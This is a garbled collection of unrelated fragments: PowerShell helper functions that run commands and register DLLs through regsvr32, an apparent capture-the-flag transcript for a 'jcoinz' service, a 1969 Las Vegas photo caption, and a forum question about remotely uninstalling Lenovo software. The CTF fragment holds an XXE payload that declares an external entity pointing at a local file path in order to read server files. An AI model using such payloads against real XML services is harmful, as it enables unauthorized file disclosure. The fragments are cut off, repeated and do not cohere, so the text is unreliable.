Invoke-Expression -Command $cmd -ErrorVariable errorVar -OutVariable outVar if($outVar -ne \"\"){ Write-Log \"Info: $outVar\" } if($errorVar -ne \"\"){ Write-Log \"Error: $errorVar\" } } function Invoke-RegSvr($pathToDll, $arg){ if(Test-Path $pathToDll) { $cmd =...
1 - sends jcoinz to charity 2 - send a secret xml message to the admin Your name: billy Your amount of jcoinz: 2147479630 <!DOCTYPE passwd [ <!ELEMENT xxe ANY><!ENTITY xxe SYSTEM "file:///home/jcoinz/" >]><foo>&xxe;</foo> [?] XML Message: <!DOCTYPE passwd [ <!ELEMENT xxe...
Benny Binion, daughter Becky, and the unveiling of the second Million Dollar Display at the Horseshoe, Las Vegas, June 4, 1969.
So i cant find an uninstall in program files but I open file location it goes to C:\ProgramData\Lenovo\ImController\Plugins\LenovoFirstRunExperiencePackage\x86 within here there is a uninstall script. How would I go about running this remotely I wouldnt need any of the lenovo bloat softw...
function Invoke-RegSvr($pathToDll, $arg){ if(Test-Path $pathToDll) { $cmd = "& $env:windir\System32\regsvr32.exe $arg '$pathToDll'" Invoke-Cmd -cmd $cmd }else{ Write-Error "Warning: DLL $pathToDll does not exist" } }